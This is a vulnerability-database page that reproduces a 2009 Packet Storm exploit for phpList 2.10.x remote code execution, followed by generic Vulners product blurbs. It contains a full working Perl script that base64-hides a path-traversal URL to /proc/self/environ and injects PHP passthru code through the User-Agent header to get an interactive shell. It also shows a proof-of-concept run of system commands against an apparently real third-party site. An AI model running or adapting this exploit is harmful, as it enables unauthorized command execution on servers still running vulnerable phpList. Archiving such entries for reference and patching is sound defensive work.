Lucene search
K

PHP-List Remote Code Execution

🗓️ 28 Jan 2009 00:00:00Reported by moziType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

PHP-List version 2.10.x is vulnerable to remote code execution due to a flaw exploited by mozi.

Code
`# phplist 2.10.x remote code execution  
# Credit:AmnPardaz Security Research Team for the vuln  
# exploit author [email protected]  
#  
# Poc  
#[root@server pentest]# perl phplistrce.pl http://www.helpcenter.it/list/  
#phplist 2.10.x 0day RCE may b others by mozi: uname -a  
#686 i686 i386 GNU/Linux  
#mozi: w  
# 04:43:41 up 108 days, 21:20, 0 users, load average: 0.24, 0.29, 0.28  
#USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT  
#mozi:  
#  
#  
Exploit Code:  
[root@server pentest]# cat phplistrce.pl  
#!/usr/bin/perl -w  
use strict;  
use LWP 5.64;  
use LWP::UserAgent;  
use MIME::Base64;  
  
  
print "phplist 2.10.x 0day RCE may b others by ";  
  
my $browser = LWP::UserAgent->new;  
my $url1 = $ARGV[0];  
my ($line,$response);  
  
  
my $url .= "L2FkbWluL2luZGV4LnBocD9fU0VSVkVSW0NvbmZpZ0ZpbGVdPS4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL3Byb2Mvc2VsZi9lbnZpcm9u";  
my $decode = decode_base64($url);  
  
my $all = $url1.$decode;  
  
print "mozi: ";  
while( $line = <STDIN>) {  
chop($line);  
$browser->agent("mozi<?passthru('$line 2> /dev/stdout');?>mozi");  
$response = $browser->get( $all );  
if ($response->content =~ /mozi(.*)mozi/s) {  
print $1;  
}  
print "mozi: ";  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jan 2009 00:00Current
7.4High risk
Vulners AI Score7.4
16